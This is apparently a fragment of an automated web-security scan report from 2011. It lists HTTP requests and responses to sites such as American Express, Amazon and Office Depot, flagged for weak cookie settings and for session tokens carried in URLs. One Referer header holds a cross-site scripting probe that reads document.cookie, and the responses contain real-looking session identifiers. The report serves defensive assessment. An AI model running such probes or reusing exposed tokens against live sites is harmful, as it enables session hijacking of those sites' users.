GET /myca/acctsumm/us/action HTTP/1.1 Host: online.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b HTTP/1.1 Host: sb.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: https://sb.voicefive.com/b2? Date: Sun, 06 Feb 2011 16:04:44 GMT Connection: close Set-Cookie: UID=4794bf8-184.50.222.110-1297008284; expires=Tue, 05-Feb-2013 16:04:44 GMT; path=/; domain=.voicefive.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /airlines-credit-card/ HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /credit-card-rewards/ HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gift/giftcardslanding.shtml HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:52:57 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296942777855214; path=/; expires=Tue, 09-Feb-16 21:52:57 GMT; domain=.americanexpress.com Accept-Ranges: bytes Cache-Control: max-age=-485925 Expires: Mon, 31 Jan 2011 06:54:12 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 64996
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gold-card/ HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /no-annual-fee-credit-cards/?source=footer_noannual_credit_cards HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /partnerzone/Forward.action HTTP/1.1 Host: www.blackberry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:05:27 GMT X-Cnection: close Content-Length: 1214 Content-Type: text/html X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: BIGipServerPlateau58_80=611926282.20480.0000; path=/ Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN"> <HTML> <HEAD> <TITLE>Error 404--Not Found</TITLE> <META NAME="GENERATOR" CONTENT="WebLogic Server"> </HEAD> <BODY bgcolor="white"> <FONT FACE=He ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /partnerzone/Login.action HTTP/1.1 Host: www.blackberry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:05:28 GMT X-Cnection: close Content-Length: 1214 Content-Type: text/html X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: BIGipServerPlateau58_80=611926282.20480.0000; path=/ Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN"> <HTML> <HEAD> <TITLE>Error 404--Not Found</TITLE> <META NAME="GENERATOR" CONTENT="WebLogic Server"> </HEAD> <BODY bgcolor="white"> <FONT FACE=He ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?cid=inav_home&inav=menu_business_openforum HTTP/1.1 Host: www.openforum.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 SSL: True Expires: Sat, 05 Feb 2011 22:07:15 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 22:07:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/ Set-Cookie: BIGipServerAmex=2735450304.20480.0000; path=/ Content-Length: 102281
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.xing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: private Pragma: no-cache Expires: Now X-Cnection: close Content-Type: text/html; charset=UTF-8 X-UA-Compatible: IE=8 X-XSS-Protection: 1; mode=block Date: Sun, 06 Feb 2011 16:16:21 GMT Content-Length: 20580 Connection: close Set-Cookie: xing=|U2FsdGVkX19_zQEE5j6F0xWakCI8lARPFH0FvSjppQxKaaEiZ97wyTiFIr3wVgNP_sOYmtw76XJUBuFfNLnN-VmebVKNIrzd8O9V5UJjwWlPD27y8semPRdDksJAU0_2|; path=/; HttpOnly
<!DOCTYPE html> <html lang="en"> <head> <title>Business Network - Social Network for Business Professionals | XING</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /consumertravel/travel.do HTTP/1.1 Host: www134.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /premium/credit-card-travel-insurance/home.do?source=footer_prem_services HTTP/1.1 Host: www152.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /merchant/mainpagedom/authreg_showMainpage.do?ssolang=en_US&ssobrand=SOMSET&dispute=N&inav=menu_myacct_merchantacct HTTP/1.1 Host: www209.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 05 Feb 2011 22:22:10 GMT Server: IBM_HTTP_Server Cache-Control: no-store Location: https://sso.americanexpress.com/SSO/request?request_type=un_logon&TYPE=33554432&REALMOID=06-bab29d3a-fb73-100d-9cef-80f7dddcfc95&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=$SM$vSv7ddov8PItwO4vXIvOBx8HCsMWMGOmYXAmNyynqt%2b0Zzw6ZC66fAn%2bpdxgQwhf&TARGET=$SM$HTTPS%3a%2f%2fwww209%2eamericanexpress%2ecom%2fmerchant%2fmainpagedom%2fauthreg_showMainpage%2edo%3fssolang%3den_US%26ssobrand%3dSOMSET%26dispute%3dN%26inav%3dmenu_myacct_merchantacct Content-Length: 739 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: BIGipServerwww309-443=3272346122.47873.0000; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://sso.americanexpress.com/SSO/request?req ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards/home.do HTTP/1.1 Host: www217.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards/shopping/index.jsp HTTP/1.1 Host: www217.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
GET /version/7.01/css/frontpage.css?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK x-amz-id-2: 5+JpAfUzR5I/l5+5terwWBJSdq4S0G7xBbqUC6YnMNqOPnKKfPS4oCsdD55z/S/d x-amz-request-id: 67E572F2463026B9 Date: Wed, 02 Feb 2011 10:25:48 GMT Last-Modified: Wed, 02 Feb 2011 09:44:48 GMT ETag: "59eaf83b40877b88329050509fa514f4" Accept-Ranges: bytes Content-Type: text/css Content-Length: 26527 Server: AmazonS3 Age: 20235 X-Cache: Hit from cloudfront X-Amz-Cf-Id: c58f9f6242adf1a61e2a8af7185e392ad623501ea3d66d16d5c992cff9045ffd8c3eb7e5f52ee857 Via: 1.0 f3f50cbd3d1def6bce4a308bcfd00161.cloudfront.net:11180 (CloudFront), 1.0 892bc90fb3654cd9a2c91531db2d359d.cloudfront.net:11180 (CloudFront) Connection: keep-alive
/**************************************************************************************/ /******** STARTSITE CSS - Hier stehen Css Klassen f..r die Startseite *****************/ /******************* ...[SNIP]...
GET /fb/a/mailverify HTTP/1.1 Host: feedburner.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=UTF-8 Date: Sat, 05 Feb 2011 23:32:44 GMT X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Set-Cookie: S=feedburner-control-panel=XBvt5onSLx9jPcXP90cfRA; Domain=.google.com; Path=/; HttpOnly Server: GSE Expires: Sat, 05 Feb 2011 23:32:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html>
GET /group/jquery-dev/browse_thread/thread/36395b7ab510dd5d HTTP/1.1 Host: groups.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /en_US/hh/home_index.do HTTP/1.1 Host: hhonors1.hilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /ex/mfg/headline/m/ariens/d/type/product_problem HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:51:06 GMT Server: Apache/2.2.14 (Fedora) X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 45370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... </script><script src="http://session.owneriq.net/regman/mem/initsession?sessionargs=YToyOntzOjM6InVyaSI7czo0ODoiL2V4L21mZy9oZWFkbGluZS9tL2FyaWVucy9kL3R5cGUvcHJvZHVjdF9wcm9ibGVtIjtzOjY6InNlcnZlciI7czozMToiaG9tZWFwcGxpYW5jZS5tYW51YWxzb25saW5lLmNvbSI7fQ,," type="text/javascript"></script> ...[SNIP]...
<p>Access thousands of manuals, user community, personal homepage, original blog content and newsletters!</p> <form onsubmit="javascript: submitRegistration('Popup'); return false;" id="sRegFormIdPopu ...[SNIP]...
GET /NA7/ats/careers/jobSearch.jsp?org=VIBRANT&cws=1 HTTP/1.1 Host: tbe.taleo.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:01:21 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Expires: Wed, 31 Dec 1969 23:59:59 GMT Set-Cookie: JSESSIONID=C945AA07FE83ACD62665BD99018DE6A5.NA7_primary_jvm; Path=/NA7/ats P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 10486
<HTML><HEAD> <STYLE type="text/css"> #taleoContent { padding: 0px; margin: 0px; margin-top: 15px; border: none; font-family: ...[SNIP]... <br>To fill out a general application form <a tabIndex='33' href='http://tbe.taleo.net/NA7/ats/careers/apply.jsp;jsessionid=C945AA07FE83ACD62665BD99018DE6A5.NA7_primary_jvm?org=VIBRANT&cws=1'>click here</a> ...[SNIP]...
GET /search/display?strqueryid=1&fc=1&websessionid=XrulBSFcVlVHM06AO6dbrhC&url=http://tools.cisco.com/security/center/home.x HTTP/1.1 Host: tools.cisco.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /index.cfm HTTP/1.1 Host: www.aeprepaid.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 21:53:10 GMT Server: Microsoft-IIS/6.0 Pragma: no-cache Expires: Sat, 05 Feb 14:53:10 Content-Language: en-US Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en"> <head>
<title>Prepaid Card - Know Your Balance</title>
<meta http-equiv="Content-Type" content="t ...[SNIP]... <li><a href="index.cfm?pageid=g05&ClientKey=Malls%20Sales%20Channel&CFID=1&CFTOKEN=C8701894A83E2EBE9F1C426E431DD246&CFSEQ=1" title="Log in to your account">Access My Account</a> ...[SNIP]... <td id="formNav"> <a href="index.cfm?pageid=g05&ClientKey=Malls%20Sales%20Channel&CFID=1&CFTOKEN=C8701894A83E2EBE9F1C426E431DD246&CFSEQ=1" class="btn" title="Return to the Gift Card home page">Cancel</a> ...[SNIP]...
GET / HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:01:25 GMT Server: Server Set-Cookie: skin=noskin; path=/; domain=.amazon.com; expires=Sat, 05-Feb-2011 23:01:25 GMT x-amz-id-1: 0KCJW8RY05PKJVC74BS4 p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: ZOHvQ9RGUMwBOJTa2KvnRusGxeBk9Xx5NIoqKO+M/pseIEcTTQSnTJ7z6CUtyShJ Vary: Accept-Encoding,User-Agent nnCoection: close Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=188-9552736-3777102; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Content-Length: 131368
<html> <head>
<style type="text/css"><!--
BODY { font-family: verdana,arial,helvetica,sans-serif; font-size: x-small; background-color: #FF ...[SNIP]... <div class="bannerImage"><a href="/gp/redirect.html/ref=pd_lpo_ix_gw_am_us_ca_en/188-9552736-3777102?ie=UTF8&location=http%3A%2F%2Fwww.amazon.ca%2Fgp%2Fhomepage.html%3Ftag%3Dlpo%255Fixgwamuscaen-21&token=AD297DDA0F9D6C887976CD08894B02DB57139A39&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-intl-crossover-0&pf_rd_r=0KCJW8RY05PKJVC74BS4&pf_rd_t=101&pf_rd_p=499834531&pf_rd_i=507846"><img src="http://g-ecx.images-amazon.com/images/G/01/gateway/visit_amazon_ca_tcg._V229026943_.gif" align="center" alt="Shop at Amazon.ca" border="0" /> ...[SNIP]... <li><a href="/gp/redirect.html/ref=gw_m_b_ir/188-9552736-3777102?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a> ...[SNIP]... <li><a href="/gp/redirect.html/ref=gw_m_b_pr/188-9552736-3777102?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a> ...[SNIP]... <li><a href="/gp/redirect.html/188-9552736-3777102?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a> ...[SNIP]... <li><a href="/gp/redirect.html/188-9552736-3777102?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a> ...[SNIP]...
GET /companies/222438/OwnerIQ HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:ZQgw03ZYfQ00azc_JSdCZKQJd4K6alIZMZdC0MUYURk89UEZXdolwx:1296946949:65fdca8a090beb3f900ea530a9bab4f648ed93f8"; Version=1; Max-Age=1799; Expires=Sat, 05-Feb-2011 23:32:29 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: JSESSIONID="ajax:4713947493888160893"; Version=1; Path=/ Set-Cookie: visit=G; Expires=Fri, 24-Feb-2079 02:16:37 GMT; Path=/ Set-Cookie: bcookie="v=1&e6f1aaac-08d7-4426-85cc-9b3490cae2cf"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Fri, 24-Feb-2079 02:16:37 GMT; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sat, 05 Feb 2011 23:02:30 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf1999f445525d5f4f58455e445a4a42198c;expires=Sat, 05-Feb-2011 23:32:45 GMT;path=/;httponly Content-Length: 26660
GET / HTTP/1.1 Host: www.mittelstandsblog.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:09:18 GMT Server: Apache X-Powered-By: PHP/5.2.6-1+lenny9 X-Pingback: http://www.mittelstandsblog.de/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 46050
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
http://www.officedepot.com/adRedir.do;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b?ciid=10156&cm_re=HOME-_-AccordionAd1_1-_-WK24SSOnlineDeals_20090611_20140629&cm_sp=Longer Living Tiles-_-v2_accordion_section_1_1-_-WK24SSOnlineDeals_20090611_20140629&redirect=false
http://www.officedepot.com/adRedir.do;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b?ciid=10157&cm_re=HOME-_-AccordionAd1_2-_-WK24SSRebateCenter_20090611_20140629&cm_sp=Longer Living Tiles-_-v2_accordion_section_1_2-_-WK24SSRebateCenter_20090611_20140629&redirect=true
http://www.officedepot.com/adRedir.do;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b?ciid=10158&cm_re=HOME-_-AccordionAd1_3-_-WK24SSClearanceCenter_20090611_20140629&cm_sp=Longer Living Tiles-_-v2_accordion_section_1_3-_-WK24SSClearanceCenter_20090611_20140629&redirect=false
http://www.officedepot.com/adRedir.do;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b?ciid=10159&cm_re=HOME-_-AccordionAd3_1-_-WK24STODBrandProd_20090611_20140629&cm_sp=Longer Living Tiles-_-v2_accordion_section_3_1-_-WK24STODBrandProd_20090611_20140629&redirect=false
http://www.officedepot.com/adRedir.do;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b?ciid=10160&cm_re=HOME-_-AccordionAd3_2-_-WK24STProductsAZ_20090611_20140629&cm_sp=Longer Living Tiles-_-v2_accordion_section_3_2-_-WK24STProductsAZ_20090611_20140629&redirect=false
http://www.officedepot.com/adRedir.do;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b?ciid=10161&cm_re=HOME-_-AccordionAd3_3-_-WK24STWLR_20090611_20140629&cm_sp=Longer Living Tiles-_-v2_accordion_section_3_3-_-WK24STWLR_20090611_20140629&redirect=true
GET / HTTP/1.1 Host: www.officedepot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="ALL DEVa TAIa OUR BUS UNI NAV STA PRE" policyref="http://www.officedepot.com/w3c/p3p.xml" Content-Type: text/html; charset=UTF-8 Content-Language: en-US Date: Sat, 05 Feb 2011 22:39:46 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: JSESSIONID=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b; Path=/ Set-Cookie: jsession_unique_id=1296945586525; Expires=Sun, 06 Feb 2011 00:09:46 GMT; Path=/ Set-Cookie: CU_BRAND=OD; Expires=Tue, 31 Jan 2012 22:39:46 GMT; Path=/ Set-Cookie: IBSD_LOCALE=en_US; Expires=Tue, 31 Jan 2012 22:39:46 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=hgPPLoHv4btY2S4F68ZL1i_; Expires=Mon, 07 Mar 2011 22:39:46 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=hgPPLoHv4btY2S4F68ZL1i_; Expires=Mon, 07 Mar 2011 22:39:46 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=hgPPLoHv4btY2S4F68ZL1i_; Expires=Mon, 07 Mar 2011 22:39:46 GMT; Path=/ Set-Cookie: cae_browser=desktop; path=/; domain=.officedepot.com Content-Length: 87491
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html class="nojs" xmlns="http://www.w3.org/1999/xhtml" x ...[SNIP]... <li id="homeLink"><a href="/;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b" class="">Home</a></li>
<li id="languageSwitch"><a href="/;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b" class="dropdown">United States (English)</a> ...[SNIP]... <div class="brandLogo"> <a href="/;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b" id="logo" class=""><img src="http://static.www.odcdn.com/images/us/od/brand.gif" alt="OfficeDepot.com - Taking Care Of Business. Office Supplies, Furniture, Technology & More!" title="OfficeDepot.com - Taking Care Of B ...[SNIP]... <li id='storeLocator' class="overlayContainer">
<a href="/storelocator/input.do;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b" target="_top" class="headingLink"><strong> ...[SNIP]... <span id="storeLocatorLinks"><a href="/storeDetails.do;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b" id="storeDetailLink" class="">Store Details</a> | <a href="/directions.do;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b" class="">Need Directions?</a> ...[SNIP]... <li id='orderByCatalog' class="overlayContainer"> <a href="/csl/quickAddBySku.do;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b" class="headingLink"><strong class="trigger"> ...[SNIP]... <li class=""><a href="/csl/quickAddBySku.do;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b">Order by Item #</a> ...[SNIP]... <li><a href="/virtualcatalog/virtualcatalog.do;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b">View Online Catalog</a> ...[SNIP]... <li><a href="/a/catalog-request/;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b">Request a Catalog</a> ...[SNIP]... <div class="smCartSummaryDiv printHide"> <a href="/specialLinks.do;jsessionid=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b?file=/misc/deliveryOptions.jsp" class="note">$50.00 more for FREE Next Business Day Delivery!*<br/> ...[SNIP]... <li id='viewCart'>
GET /promo/list5.do HTTP/1.1 Host: www.officedepot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="ALL DEVa TAIa OUR BUS UNI NAV STA PRE" policyref="http://www.officedepot.com/w3c/p3p.xml" Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Sat, 05 Feb 2011 22:40:01 GMT Content-Length: 6309 Connection: close Set-Cookie: JSESSIONID=0000N7JB0IDdbJzrbHY1HCK2e8j:13ddq0uth; Path=/ Set-Cookie: jsession_unique_id=1296945606192; Expires=Sun, 06 Feb 2011 00:10:06 GMT; Path=/ Set-Cookie: CU_BRAND=OD; Expires=Tue, 31 Jan 2012 22:40:06 GMT; Path=/ Set-Cookie: IBSD_LOCALE=en_US; Expires=Tue, 31 Jan 2012 22:40:06 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=N7JB0IDdbJzrbHY1HCK2e8j; Expires=Mon, 07 Mar 2011 22:40:06 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=N7JB0IDdbJzrbHY1HCK2e8j; Expires=Mon, 07 Mar 2011 22:40:06 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=N7JB0IDdbJzrbHY1HCK2e8j; Expires=Mon, 07 Mar 2011 22:40:06 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=N7JB0IDdbJzrbHY1HCK2e8j; Expires=Mon, 07 Mar 2011 22:40:06 GMT; Path=/ Set-Cookie: cae_browser=desktop; path=/; 